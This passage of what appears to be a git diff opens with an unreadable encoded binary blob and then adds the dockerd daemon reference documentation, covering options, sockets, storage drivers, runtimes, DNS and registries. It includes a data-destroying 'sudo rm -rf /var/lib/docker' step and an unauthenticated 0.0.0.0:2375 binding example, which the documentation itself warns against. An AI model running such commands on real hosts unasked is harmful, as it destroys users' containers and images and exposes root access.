z3DqjRV_e_BKP#5J1OW@bt1~e*Wz&HrZ9wl`g8MVV=^u{#2?W!Yn##7iQJdQ9L>SA` z)NmAc($d6IDxDILxD12|B}io>O5Vn8fF~f_hF}jMRJ0H$3a*_E_B_yNMO<}J*7wy1 zb^>%A3043?fgEV6B`aY=Frn0Byt#HR_z3;ErIjO}F-1#}Tor}CpzL13*&zsG$}n$i zq!^&Q7QkrN40+@EUjG2da#3YKn06qq8eFS|yQL28{tm)KJL{j$;kyrbJayrsduv#8 za>Nc?bUPxahpGjk^PM9?fhDzoTW_0sGF_e=zNu4irh|geiHJ*BLKsv7^#>a>$>3-z z;j#|FNI`e)wqwijqaR0r6Hg)dFub;M>k8CzO$07-b`OPUQ)@vc!5_bRVQV`Iapr?> zJANH-jlUBRwT}=p;rQBwU_?1s`@P$SyEEUi$JMj5_)Citk@1PET|AZ0w(WeS=h!iMD$Mby%7)2t6CnZK?p)5H8&5dXb3DFwC-7YA?WQJp&l^V!(`I>(-5u{c z7gKwR@)`!B4);ws@H!H7DDaz!&ePrmC0zVHhPC9h{nMIC>D;||h5>_@IkU}a1O!Ut z56dv40cw*j`?N%=!`(aG*@p?cF;?nC2g%+ekRy0vq!VuzTJ90*0zf&d9FiZ{#l4Rc zr8XsU9tU_I%hpN@R(huNEEtNP8FXnGY>ytkd5{3N)Q)e!=5%Pl3b-*KxpvLj6^E%;xUG=2X)_@@ew!RB2iA1{}jMi!I7Qr0|PO;OaM7ykxg_$7`0HAvo8DLn4aqQ1?__Hx zylC6PsT*_h4`N3^_hH!;zu3(*4P}N#y~8OzBBIvzvH|Of9tMH;S68O0OH)CeBRbE0 zftY(N)H@BlI={j+lYmY-I@63A)U(r4*Q3nX-&FU_05o}JUx#Zs=*Y4+^NLcv)^Na64ihOvvsJXPbQO>u#>($)eSKpjp{y6`t zr~K8H`uv}luVVhb0%WHlbM`YIHh0A+hoGJ5Ve>b42>fGzl3Eh#uNOJGq?xcJQBf+@ zzjR=JN%qqvoa}P2(X!%&1f>hh%&W_)&HieO%TwQ%wVFM2%wJD=yf)As1fPF0YW6v=01Z%R#$F%HI4emuKNw zNBbAY&G!0FvQ7PDs^V9-oE1mG>5vPH{?F&aE7)9LGNJ|8g4OBqvJRZ|QQX(vH1nOc z9T*-_=)I7mb~Qw>!cD(VPkvgL!~uThAEmVm=Ffec6aba(f7Ic`*10}S=D^O@pS1Dj z|FS=I9^Gd%`AHTFz7pV=Dzd+62=P^){WbaC|H<0+CyXMcbDV}yVShgN6w+j#)x||M zH(4%tS}I#xDln~ju35@^5RkXdnj~))=^*w{Esb!Ssgb}-qYddqV77Ee&7Kj;v8Zgq z`{jtB`-6Rk!7gLDLw*4P0r@dMtICcB$ec%g)j3As4Dc`JALAv~m>iQK{LxpU7pvaF z3RagrfI#gDx6(@#nMLN6~XAFw?bM2Eg)LI>B#CvQ5F@c zXXP~!1@+>^`jq1OlY&z^#Z$uEwzlu1liC8lr!1ny(xO@w7wKl?)vut|m${^PH7WS_0u z3J5|@gM@{KhlKz

hX^kC2g)la!T~mzbHFo1C4VpP-?lqok##r91$LtE>yEgg*cx zMgR*+PD2C&MuQqiPD=nShd>7aD1*Vsg*wIn8iytT1h=k*u_A;k001zAAKin}BZkGt zgDWP3v=prFhl;22^Yr!h_xSnx`~01$?*N@Zcr_>%iW>mb4VsbA$%-4vgsm!&AmTDZ zMqJ@I)B->afdrix95jT%3jz(DSR-T%5ye3TE{K?UfI&cj@%ri9|H-qb&!0epq6&HQ zkcN;rJnoRV4nT&IHKNJ@@Sz4TLm~oLTqPuBAtdLH7E1cjNr8_@7y$Soa6ln&g0N~; z0svysn>mH*-OIPH-@kwx{kw|@1%M%h7!INJA<>5&1tLcVAfUiTLoF6;ojB~!0EmVW zFFfpI>5`@;oPYpu)rsNOgfas=M;Pa#z_@ek-p#xBqrtTc(egHEgk~oc4iFj=&Jfc> z5ELp~r6hppLOTZB8cxXgppLB>K;Qxb8S*FJZTaP>V#bSO{&-ylr=AOHXm zlyK1x7XVNI45z&yfB+w$P+%_r3?RY?0TL4AkVWEXx6hEPhglJThMEbX zo0e+osi?*`pQx<1>MEe5rYh^Kw4S=^tGMQ>>u#~u>g%t-x^wHU#1?C8PrU}K?6S2E zd+f8&Mr%s4%vNhHpUz6F?Y7)jLhZHSh8s|}-Ii;v|F++XtM0mlkbCaC@amc_yYzzV zZoK&B`{}&y2%*Ad4%OHputTWuB`ZtZkeYx71Ej+U09$*nz7$uiBfqOG*qlnoIS9e8 zMu@QSDlm@bbcJ*wZq^2wZB3VLc3{-vpo0@Lpg`#kD4>v( z)J8~M(lslfz+ypp1AM~@-Yn6=3S9q?H;cn50fXCxDDi>`HDvws434YNS`AWry&Mc9 zaG1d}FI=Sq&WSpK#Nsm`w!@Y$*tN>bXU8u4|2@4bag+uch%f*(;(V}#5d)?CLI4Ol zp@Is8n4pf(g30t8rq zTM-i1rV~aKFw7D#08qjXw|p=I5E&SNAe69x(`djvKybhSWF#!5&F+B^yoV0}P&!0F zX%Gm3NK#JYg#1Yj0>xv1Xll?NCuG1TFc1I-nF9?ImT&g9Xz9gQ+!8Pj-bU#S~3(sV}%WCI1DZ=CzD4+(2&}NCnh~{5FA*G3kl&y z`INGTd4#1ySaTlqxo!ji*juJHh652q4w2!Yi|Y!3O950UlI~#0C6~#}OhkZ<7W5%4 zh5>*Nm2nVf90UaR2E;??q7b23AOg({s6Zj%0{Fd7ni5F>01S1_P&z>g#dCr}uVbDnmFWWT(||!+Inl(( zQkFH4P%msr2nw81p5Z700O+J4|6mfwWbQFSg&@$Ley(BwE*Pjz1=@s_t|Ay5_!;sT zl7T@OMg)n2{Kp^_*qCv4B zjuHmIA`rCD3FOIRS0J#29e{5MOQ1_*fB+*I(Z~rUxQuL^AhID0A)bXWUlVr9SZ0!d ziiB8#$Ov!)BUEVtY*9e~fVcuNu_&7qAYUO;NEw!vrT`?jS!d`LYW%JimFlPG>BaXVe$)KLwM12 z`NiuhN+19xnD@Y0qyYd9#wQAZpk5Fr%u;B8;0i}@0|T%WVM@@T1aK(AAZEo72CxAO zn|O9lXg~opTomSV;FTecF-Z#0fG3>z#%F6n0|>xi8T*(|c5T37aZKc`LU9N zV;BtBxX4gunhON*+9g{#AT=OsPNU4_r6pkl=QDw5uS{mRn!o@6*gz7x%;u#X;RI-& zh5-&h=Q`W@&UntVp7+e>KKuF4fDW{s4S*5=7~lkyY_p=hoP!v+fCZ3_w4^6Z=}KGr z(wNS)rZ>&$PD|PaCNaptnioy#Qk(kJs7|%2SIz2HyZY6zj + +# daemon + +```markdown +Usage: dockerd [OPTIONS] + +A self-sufficient runtime for containers. 
+ +Options: + --add-runtime value Register an additional OCI compatible runtime (default []) + --api-cors-header string Set CORS headers in the Engine API + --authorization-plugin value Authorization plugins to load (default []) + --bip string Specify network bridge IP + -b, --bridge string Attach containers to a network bridge + --cgroup-parent string Set parent cgroup for all containers + --cluster-advertise string Address or interface name to advertise + --cluster-store string URL of the distributed storage backend + --cluster-store-opt value Set cluster store options (default map[]) + --config-file string Daemon configuration file (default "/etc/docker/daemon.json") + --containerd string Path to containerd socket + -D, --debug Enable debug mode + --default-gateway value Container default gateway IPv4 address + --default-gateway-v6 value Container default gateway IPv6 address + --default-runtime string Default OCI runtime for containers (default "runc") + --default-ulimit value Default ulimits for containers (default []) + --disable-legacy-registry Disable contacting legacy registries + --dns value DNS server to use (default []) + --dns-opt value DNS options to use (default []) + --dns-search value DNS search domains to use (default []) + --exec-opt value Runtime execution options (default []) + --exec-root string Root directory for execution state files (default "/var/run/docker") + --experimental Enable experimental features + --fixed-cidr string IPv4 subnet for fixed IPs + --fixed-cidr-v6 string IPv6 subnet for fixed IPs + -g, --graph string Root of the Docker runtime (default "/var/lib/docker") + -G, --group string Group for the unix socket (default "docker") + --help Print usage + -H, --host value Daemon socket(s) to connect to (default []) + --icc Enable inter-container communication (default true) + --init Run an init in the container to forward signals and reap processes + --init-path string Path to the docker-init binary + --insecure-registry value 
Enable insecure registry communication (default []) + --ip value Default IP when binding container ports (default 0.0.0.0) + --ip-forward Enable net.ipv4.ip_forward (default true) + --ip-masq Enable IP masquerading (default true) + --iptables Enable addition of iptables rules (default true) + --ipv6 Enable IPv6 networking + --label value Set key=value labels to the daemon (default []) + --live-restore Enable live restore of docker when containers are still running (Linux only) + --log-driver string Default driver for container logs (default "json-file") + -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") + --log-opt value Default log driver options for containers (default map[]) + --max-concurrent-downloads int Set the max concurrent downloads for each pull (default 3) + --max-concurrent-uploads int Set the max concurrent uploads for each push (default 5) + --metrics-addr string Set address and port to serve the metrics api (default "") + --mtu int Set the containers network MTU + --oom-score-adjust int Set the oom_score_adj for the daemon (default -500) + -p, --pidfile string Path to use for daemon PID file (default "/var/run/docker.pid") + --raw-logs Full timestamps without ANSI coloring + --registry-mirror value Preferred Docker registry mirror (default []) + --seccomp-profile value Path to seccomp profile + --selinux-enabled Enable selinux support + --shutdown-timeout=15 Set the shutdown timeout value in seconds + -s, --storage-driver string Storage driver to use + --storage-opt value Storage driver options (default []) + --swarm-default-advertise-addr string Set default address or interface for swarm advertised address + --tls Use TLS; implied by --tlsverify + --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") + --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") + --tlskey string Path to TLS key file (default "/root/.docker/key.pem") + 
--tlsverify Use TLS and verify the remote + --userland-proxy Use userland proxy for loopback traffic (default true) + --userland-proxy-path string Path to the userland proxy binary + --userns-remap string User/Group setting for user namespaces + -v, --version Print version information and quit +``` + +Options with [] may be specified multiple times. + +dockerd is the persistent process that manages containers. Docker +uses different binaries for the daemon and client. To run the daemon you +type `dockerd`. + +To run the daemon with debug output, use `dockerd -D`. + +## Daemon socket option + +The Docker daemon can listen for [Docker Engine API](../api/) +requests via three different types of Socket: `unix`, `tcp`, and `fd`. + +By default, a `unix` domain socket (or IPC socket) is created at +`/var/run/docker.sock`, requiring either `root` permission, or `docker` group +membership. + +If you need to access the Docker daemon remotely, you need to enable the `tcp` +Socket. Beware that the default setup provides un-encrypted and +un-authenticated direct access to the Docker daemon - and should be secured +either using the [built in HTTPS encrypted socket](https://docs.docker.com/engine/security/https/), or by +putting a secure web proxy in front of it. You can listen on port `2375` on all +network interfaces with `-H tcp://0.0.0.0:2375`, or on a particular network +interface using its IP address: `-H tcp://192.168.59.103:2375`. It is +conventional to use port `2375` for un-encrypted, and port `2376` for encrypted +communication with the daemon. + +> **Note:** +> If you're using an HTTPS encrypted socket, keep in mind that only +> TLS1.0 and greater are supported. Protocols SSLv3 and under are not +> supported anymore for security reasons. + +On Systemd based systems, you can communicate with the daemon via +[Systemd socket activation](http://0pointer.de/blog/projects/socket-activation.html), +use `dockerd -H fd://`. 
Using `fd://` will work perfectly for most setups but +you can also specify individual sockets: `dockerd -H fd://3`. If the +specified socket activated files aren't found, then Docker will exit. You can +find examples of using Systemd socket activation with Docker and Systemd in the +[Docker source tree](https://github.com/docker/docker/tree/master/contrib/init/systemd/). + +You can configure the Docker daemon to listen to multiple sockets at the same +time using multiple `-H` options: + +```bash +# listen using the default unix socket, and on 2 specific IP addresses on this host. +$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://192.168.59.106 -H tcp://10.10.10.2 +``` + +The Docker client will honor the `DOCKER_HOST` environment variable to set the +`-H` flag for the client. + +```bash +$ docker -H tcp://0.0.0.0:2375 ps +# or +$ export DOCKER_HOST="tcp://0.0.0.0:2375" +$ docker ps +# both are equal +``` + +Setting the `DOCKER_TLS_VERIFY` environment variable to any value other than +the empty string is equivalent to setting the `--tlsverify` flag. The following +are equivalent: + +```bash +$ docker --tlsverify ps +# or +$ export DOCKER_TLS_VERIFY=1 +$ docker ps +``` + +The Docker client will honor the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` +environment variables (or the lowercase versions thereof). `HTTPS_PROXY` takes +precedence over `HTTP_PROXY`. + +### Bind Docker to another host/port or a Unix socket + +> **Warning**: +> Changing the default `docker` daemon binding to a +> TCP port or Unix *docker* user group will increase your security risks +> by allowing non-root users to gain *root* access on the host. Make sure +> you control access to `docker`. If you are binding +> to a TCP port, anyone with access to that port has full Docker access; +> so it is not advisable on an open network. + +With `-H` it is possible to make the Docker daemon to listen on a +specific IP and port. 
By default, it will listen on +`unix:///var/run/docker.sock` to allow only local connections by the +*root* user. You *could* set it to `0.0.0.0:2375` or a specific host IP +to give access to everybody, but that is **not recommended** because +then it is trivial for someone to gain root access to the host where the +daemon is running. + +Similarly, the Docker client can use `-H` to connect to a custom port. +The Docker client will default to connecting to `unix:///var/run/docker.sock` +on Linux, and `tcp://127.0.0.1:2376` on Windows. + +`-H` accepts host and port assignment in the following format: + + tcp://[host]:[port][path] or unix://path + +For example: + +- `tcp://` -> TCP connection to `127.0.0.1` on either port `2376` when TLS encryption + is on, or port `2375` when communication is in plain text. +- `tcp://host:2375` -> TCP connection on + host:2375 +- `tcp://host:2375/path` -> TCP connection on + host:2375 and prepend path to all requests +- `unix://path/to/socket` -> Unix socket located + at `path/to/socket` + +`-H`, when empty, will default to the same value as +when no `-H` was passed in. + +`-H` also accepts short form for TCP bindings: `host:` or `host:port` or `:port` + +Run Docker in daemon mode: + +```bash +$ sudo /dockerd -H 0.0.0.0:5555 & +``` + +Download an `ubuntu` image: + +```bash +$ docker -H :5555 pull ubuntu +``` + +You can use multiple `-H`, for example, if you want to listen on both +TCP and a Unix socket + +```bash +# Run docker in daemon mode +$ sudo /dockerd -H tcp://127.0.0.1:2375 -H unix:///var/run/docker.sock & +# Download an ubuntu image, use default Unix socket +$ docker pull ubuntu +# OR use the TCP port +$ docker -H tcp://127.0.0.1:2375 pull ubuntu +``` + +### Daemon storage-driver option + +The Docker daemon has support for several different image layer storage +drivers: `aufs`, `devicemapper`, `btrfs`, `zfs`, `overlay` and `overlay2`. 
+ +The `aufs` driver is the oldest, but is based on a Linux kernel patch-set that +is unlikely to be merged into the main kernel. These are also known to cause +some serious kernel crashes. However, `aufs` allows containers to share +executable and shared library memory, so is a useful choice when running +thousands of containers with the same program or libraries. + +The `devicemapper` driver uses thin provisioning and Copy on Write (CoW) +snapshots. For each devicemapper graph location – typically +`/var/lib/docker/devicemapper` – a thin pool is created based on two block +devices, one for data and one for metadata. By default, these block devices +are created automatically by using loopback mounts of automatically created +sparse files. Refer to [Storage driver options](#storage-driver-options) below +for a way how to customize this setup. +[~jpetazzo/Resizing Docker containers with the Device Mapper plugin](http://jpetazzo.github.io/2014/01/29/docker-device-mapper-resize/) +article explains how to tune your existing setup without the use of options. + +The `btrfs` driver is very fast for `docker build` - but like `devicemapper` +does not share executable memory between devices. Use +`dockerd -s btrfs -g /mnt/btrfs_partition`. + +The `zfs` driver is probably not as fast as `btrfs` but has a longer track record +on stability. Thanks to `Single Copy ARC` shared blocks between clones will be +cached only once. Use `dockerd -s zfs`. To select a different zfs filesystem +set `zfs.fsname` option as described in [Storage driver options](#storage-driver-options). + +The `overlay` is a very fast union filesystem. It is now merged in the main +Linux kernel as of [3.18.0](https://lkml.org/lkml/2014/10/26/137). `overlay` +also supports page cache sharing, this means multiple containers accessing +the same file can share a single page cache entry (or entries), it makes +`overlay` as efficient with memory as `aufs` driver. Call +`dockerd -s overlay` to use it. 
+ +> **Note:** +> As promising as `overlay` is, the feature is still quite young and should not +> be used in production. Most notably, using `overlay` can cause excessive +> inode consumption (especially as the number of images grows), as well as +> being incompatible with the use of RPMs. + +The `overlay2` uses the same fast union filesystem but takes advantage of +[additional features](https://lkml.org/lkml/2015/2/11/106) added in Linux +kernel 4.0 to avoid excessive inode consumption. Call `dockerd -s overlay2` +to use it. + +> **Note:** +> Both `overlay` and `overlay2` are currently unsupported on `btrfs` or any +> Copy on Write filesystem and should only be used over `ext4` partitions. + +### Storage driver options + +Particular storage-driver can be configured with options specified with +`--storage-opt` flags. Options for `devicemapper` are prefixed with `dm`, +options for `zfs` start with `zfs` and options for `btrfs` start with `btrfs`. + +#### Devicemapper options + +* `dm.thinpooldev` + + Specifies a custom block storage device to use for the thin pool. + + If using a block device for device mapper storage, it is best to use `lvm` + to create and manage the thin-pool volume. This volume is then handed to Docker + to exclusively create snapshot volumes needed for images and containers. + + Managing the thin-pool outside of Engine makes for the most feature-rich + method of having Docker utilize device mapper thin provisioning as the + backing storage for Docker containers. The highlights of the lvm-based + thin-pool management feature include: automatic or interactive thin-pool + resize support, dynamically changing thin-pool features, automatic thinp + metadata checking when lvm activates the thin-pool, etc. + + As a fallback if no thin pool is provided, loopback files are + created. Loopback is very slow, but can be used without any + pre-configuration of storage. It is strongly recommended that you do + not use loopback in production. 
Ensure your Engine daemon has a + `--storage-opt dm.thinpooldev` argument provided. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.thinpooldev=/dev/mapper/thin-pool + ``` + +* `dm.basesize` + + Specifies the size to use when creating the base device, which limits the + size of images and containers. The default value is 10G. Note, thin devices + are inherently "sparse", so a 10G device which is mostly empty doesn't use + 10 GB of space on the pool. However, the filesystem will use more space for + the empty case the larger the device is. + + The base device size can be increased at daemon restart which will allow + all future images and containers (based on those new images) to be of the + new base device size. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.basesize=50G + ``` + + This will increase the base device size to 50G. The Docker daemon will throw an + error if existing base device size is larger than 50G. A user can use + this option to expand the base device size however shrinking is not permitted. + + This value affects the system-wide "base" empty filesystem + that may already be initialized and inherited by pulled images. Typically, + a change to this value requires additional steps to take effect: + + ```bash + $ sudo service docker stop + $ sudo rm -rf /var/lib/docker + $ sudo service docker start + ``` + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.basesize=20G + ``` + +* `dm.loopdatasize` + + > **Note**: + > This option configures devicemapper loopback, which should not + > be used in production. + + Specifies the size to use when creating the loopback file for the + "data" device which is used for the thin pool. The default size is + 100G. The file is sparse, so it will not initially take up this + much space. 
+ + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.loopdatasize=200G + ``` + +* `dm.loopmetadatasize` + + > **Note**: + > This option configures devicemapper loopback, which should not + > be used in production. + + Specifies the size to use when creating the loopback file for the + "metadata" device which is used for the thin pool. The default size + is 2G. The file is sparse, so it will not initially take up + this much space. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.loopmetadatasize=4G + ``` + +* `dm.fs` + + Specifies the filesystem type to use for the base device. The supported + options are "ext4" and "xfs". The default is "xfs" + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.fs=ext4 + ``` + +* `dm.mkfsarg` + + Specifies extra mkfs arguments to be used when creating the base device. + + Example use: + + ```bash + $ sudo dockerd --storage-opt "dm.mkfsarg=-O ^has_journal" + ``` + +* `dm.mountopt` + + Specifies extra mount options used when mounting the thin devices. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.mountopt=nodiscard + ``` + +* `dm.datadev` + + (Deprecated, use `dm.thinpooldev`) + + Specifies a custom blockdevice to use for data for the thin pool. + + If using a block device for device mapper storage, ideally both datadev and + metadatadev should be specified to completely avoid using the loopback + device. + + Example use: + + ```bash + $ sudo dockerd \ + --storage-opt dm.datadev=/dev/sdb1 \ + --storage-opt dm.metadatadev=/dev/sdc1 + ``` + +* `dm.metadatadev` + + (Deprecated, use `dm.thinpooldev`) + + Specifies a custom blockdevice to use for metadata for the thin pool. + + For best performance the metadata should be on a different spindle than the + data, or even better on an SSD. + + If setting up a new metadata pool it is required to be valid. 
This can be + achieved by zeroing the first 4k to indicate empty metadata, like this: + + ```bash + $ dd if=/dev/zero of=$metadata_dev bs=4096 count=1 + ``` + + Example use: + + ```bash + $ sudo dockerd \ + --storage-opt dm.datadev=/dev/sdb1 \ + --storage-opt dm.metadatadev=/dev/sdc1 + ``` + +* `dm.blocksize` + + Specifies a custom blocksize to use for the thin pool. The default + blocksize is 64K. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.blocksize=512K + ``` + +* `dm.blkdiscard` + + Enables or disables the use of blkdiscard when removing devicemapper + devices. This is enabled by default (only) if using loopback devices and is + required to resparsify the loopback file on image/container removal. + + Disabling this on loopback can lead to *much* faster container removal + times, but will make the space used in `/var/lib/docker` directory not be + returned to the system for other use when containers are removed. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.blkdiscard=false + ``` + +* `dm.override_udev_sync_check` + + Overrides the `udev` synchronization checks between `devicemapper` and `udev`. + `udev` is the device manager for the Linux kernel. + + To view the `udev` sync support of a Docker daemon that is using the + `devicemapper` driver, run: + + ```bash + $ docker info + [...] + Udev Sync Supported: true + [...] + ``` + + When `udev` sync support is `true`, then `devicemapper` and udev can + coordinate the activation and deactivation of devices for containers. + + When `udev` sync support is `false`, a race condition occurs between + the`devicemapper` and `udev` during create and cleanup. The race condition + results in errors and failures. 
(For information on these failures, see + [docker#4036](https://github.com/docker/docker/issues/4036)) + + To allow the `docker` daemon to start, regardless of `udev` sync not being + supported, set `dm.override_udev_sync_check` to true: + + ```bash + $ sudo dockerd --storage-opt dm.override_udev_sync_check=true + ``` + + When this value is `true`, the `devicemapper` continues and simply warns + you the errors are happening. + + > **Note:** + > The ideal is to pursue a `docker` daemon and environment that does + > support synchronizing with `udev`. For further discussion on this + > topic, see [docker#4036](https://github.com/docker/docker/issues/4036). + > Otherwise, set this flag for migrating existing Docker daemons to + > a daemon with a supported environment. + +* `dm.use_deferred_removal` + + Enables use of deferred device removal if `libdm` and the kernel driver + support the mechanism. + + Deferred device removal means that if device is busy when devices are + being removed/deactivated, then a deferred removal is scheduled on + device. And devices automatically go away when last user of the device + exits. + + For example, when a container exits, its associated thin device is removed. + If that device has leaked into some other mount namespace and can't be + removed, the container exit still succeeds and this option causes the + system to schedule the device for deferred removal. It does not wait in a + loop trying to remove a busy device. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.use_deferred_removal=true + ``` + +* `dm.use_deferred_deletion` + + Enables use of deferred device deletion for thin pool devices. By default, + thin pool device deletion is synchronous. Before a container is deleted, + the Docker daemon removes any associated devices. If the storage driver + can not remove a device, the container deletion fails and daemon returns. 
+
+        Error deleting container: Error response from daemon: Cannot destroy container
+
+    To avoid this failure, enable both deferred device deletion and deferred
+    device removal on the daemon.
+
+    ```bash
+    $ sudo dockerd \
+        --storage-opt dm.use_deferred_deletion=true \
+        --storage-opt dm.use_deferred_removal=true
+    ```
+
+    With these two options enabled, if a device is busy when the driver is
+    deleting a container, the driver marks the device as deleted. Later, when
+    the device isn't in use, the driver deletes it.
+
+    In general it should be safe to enable this option by default. It will help
+    when unintentional leaking of mount point happens across multiple mount
+    namespaces.
+
+* `dm.min_free_space`
+
+    Specifies the minimum free space percent in a thin pool required for new
+    device creation to succeed. This check applies to both free data space as
+    well as free metadata space. Valid values are from 0% - 99%. Value 0%
+    disables free space checking logic. If the user does not specify a value
+    for this option, the Engine uses a default value of 10%.
+
+    Whenever a new thin pool device is created (during `docker pull` or during
+    container creation), the Engine checks if the minimum free space is
+    available. If sufficient space is unavailable, then device creation fails
+    and any relevant `docker` operation fails.
+
+    To recover from this error, you must create more free space in the thin
+    pool. You can create free space by deleting some images
+    and containers from the thin pool. You can also add more storage to the thin
+    pool.
+
+    To add more space to an LVM (logical volume management) thin pool, just add
+    more storage to the volume group container thin pool; this should automatically
+    resolve any errors. If your configuration uses loop devices, then stop the
+    Engine daemon, grow the size of loop files and restart the daemon to resolve
+    the issue. 
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.min_free_space=10%
+    ```
+
+* `dm.xfs_nospace_max_retries`
+
+    Specifies the maximum number of retries XFS should attempt to complete
+    IO when ENOSPC (no space) error is returned by underlying storage device.
+
+    By default XFS retries infinitely for IO to finish and this can result
+    in an unkillable process. To change this behavior one can set
+    xfs_nospace_max_retries to say 0 and XFS will not retry IO after getting
+    ENOSPC and will shut down the filesystem.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0
+    ```
+
+#### ZFS options
+
+* `zfs.fsname`
+
+    Set zfs filesystem under which docker will create its own datasets.
+    By default docker will pick up the zfs filesystem where docker graph
+    (`/var/lib/docker`) is located.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd -s zfs --storage-opt zfs.fsname=zroot/docker
+    ```
+
+#### Btrfs options
+
+* `btrfs.min_space`
+
+    Specifies the minimum size to use when creating the subvolume which is used
+    for containers. If the user uses disk quota for btrfs when creating or running
+    a container with **--storage-opt size** option, docker should ensure the
+    **size** cannot be smaller than **btrfs.min_space**.
+
+    Example use:
+
+    ```bash
+    $ sudo dockerd -s btrfs --storage-opt btrfs.min_space=10G
+    ```
+
+#### Overlay2 options
+
+* `overlay2.override_kernel_check`
+
+    Overrides the Linux kernel version check allowing overlay2. Support for
+    specifying multiple lower directories needed by overlay2 was added to the
+    Linux kernel in 4.0.0. However, some older kernel versions may be patched
+    to add multiple lower directory support for OverlayFS. This option should
+    only be used after verifying this support exists in the kernel. Applying
+    this option on a kernel without this support will cause failures on mount. 
+
+## Docker runtime execution options
+
+The Docker daemon relies on an
+[OCI](https://github.com/opencontainers/runtime-spec) compliant runtime
+(invoked via the `containerd` daemon) as its interface to the Linux
+kernel `namespaces`, `cgroups`, and `SELinux`.
+
+By default, the Docker daemon automatically starts `containerd`. If you want to
+control `containerd` startup, manually start `containerd` and pass the path to
+the `containerd` socket using the `--containerd` flag. For example:
+
+```bash
+$ sudo dockerd --containerd /var/run/dev/docker-containerd.sock
+```
+
+Runtimes can be registered with the daemon either via the
+configuration file or using the `--add-runtime` command line argument.
+
+The following is an example adding 2 runtimes via the configuration:
+
+```json
+{
+    "default-runtime": "runc",
+    "runtimes": {
+        "runc": {
+            "path": "runc"
+        },
+        "custom": {
+            "path": "/usr/local/bin/my-runc-replacement",
+            "runtimeArgs": [
+                "--debug"
+            ]
+        }
+    }
+}
+```
+
+This is the same example via the command line:
+
+```bash
+$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement
+```
+
+> **Note**: defining runtime arguments via the command line is not supported.
+
+## Options for the runtime
+
+You can configure the runtime using options specified
+with the `--exec-opt` flag. All the flag's options have the `native` prefix. A
+single `native.cgroupdriver` option is available.
+
+The `native.cgroupdriver` option specifies the management of the container's
+cgroups. You can only specify `cgroupfs` or `systemd`. If you specify
+`systemd` and it is not available, the system errors out. If you omit the
+`native.cgroupdriver` option, `cgroupfs` is used.
+
+This example sets the `cgroupdriver` to `systemd`:
+
+```bash
+$ sudo dockerd --exec-opt native.cgroupdriver=systemd
+```
+
+Setting this option applies to all containers the daemon launches.
+
+Also Windows Container makes use of `--exec-opt` for a special purpose. 
Docker user +can specify default container isolation technology with this, for example: + +```bash +$ sudo dockerd --exec-opt isolation=hyperv +``` + +Will make `hyperv` the default isolation technology on Windows. If no isolation +value is specified on daemon start, on Windows client, the default is +`hyperv`, and on Windows server, the default is `process`. + +## Daemon DNS options + +To set the DNS server for all Docker containers, use: + +```bash +$ sudo dockerd --dns 8.8.8.8 +``` + + +To set the DNS search domain for all Docker containers, use: + +```bash +$ sudo dockerd --dns-search example.com +``` + + +## Insecure registries + +Docker considers a private registry either secure or insecure. In the rest of +this section, *registry* is used for *private registry*, and `myregistry:5000` +is a placeholder example for a private registry. + +A secure registry uses TLS and a copy of its CA certificate is placed on the +Docker host at `/etc/docker/certs.d/myregistry:5000/ca.crt`. An insecure +registry is either not using TLS (i.e., listening on plain text HTTP), or is +using TLS with a CA certificate not known by the Docker daemon. The latter can +happen when the certificate was not found under +`/etc/docker/certs.d/myregistry:5000/`, or if the certificate verification +failed (i.e., wrong CA). + +By default, Docker assumes all, but local (see local registries below), +registries are secure. Communicating with an insecure registry is not possible +if Docker assumes that registry is secure. In order to communicate with an +insecure registry, the Docker daemon requires `--insecure-registry` in one of +the following two forms: + +* `--insecure-registry myregistry:5000` tells the Docker daemon that + myregistry:5000 should be considered insecure. +* `--insecure-registry 10.1.0.0/16` tells the Docker daemon that all registries + whose domain resolve to an IP address is part of the subnet described by the + CIDR syntax, should be considered insecure. 
+ +The flag can be used multiple times to allow multiple registries to be marked +as insecure. + +If an insecure registry is not marked as insecure, `docker pull`, +`docker push`, and `docker search` will result in an error message prompting +the user to either secure or pass the `--insecure-registry` flag to the Docker +daemon as described above. + +Local registries, whose IP address falls in the 127.0.0.0/8 range, are +automatically marked as insecure as of Docker 1.3.2. It is not recommended to +rely on this, as it may change in the future. + +Enabling `--insecure-registry`, i.e., allowing un-encrypted and/or untrusted +communication, can be useful when running a local registry. However, +because its use creates security vulnerabilities it should ONLY be enabled for +testing purposes. For increased security, users should add their CA to their +system's list of trusted CAs instead of enabling `--insecure-registry`. + +## Legacy Registries + +Enabling `--disable-legacy-registry` forces a docker daemon to only interact with registries which support the V2 protocol. Specifically, the daemon will not attempt `push`, `pull` and `login` to v1 registries. The exception to this is `search` which can still be performed on v1 registries. + +## Running a Docker daemon behind an HTTPS_PROXY + +When running inside a LAN that uses an `HTTPS` proxy, the Docker Hub +certificates will be replaced by the proxy's certificates. These certificates +need to be added to your Docker host's configuration: + +1. Install the `ca-certificates` package for your distribution +2. Ask your network admin for the proxy's CA certificate and append them to + `/etc/pki/tls/certs/ca-bundle.crt` +3. Then start your Docker daemon with `HTTPS_PROXY=http://username:password@proxy:port/ dockerd`. + The `username:` and `password@` are optional - and are only needed if your + proxy is set up to require authentication. 
+
+This will only add the proxy and authentication to the Docker daemon's requests -
+your `docker build`s and running containers will need extra configuration to
+use the proxy.
+
+## Default Ulimits
+
+`--default-ulimit` allows you to set the default `ulimit` options to use for
+all containers. It takes the same options as `--ulimit` for `docker run`. If
+these defaults are not set, `ulimit` settings will be inherited, if not set on
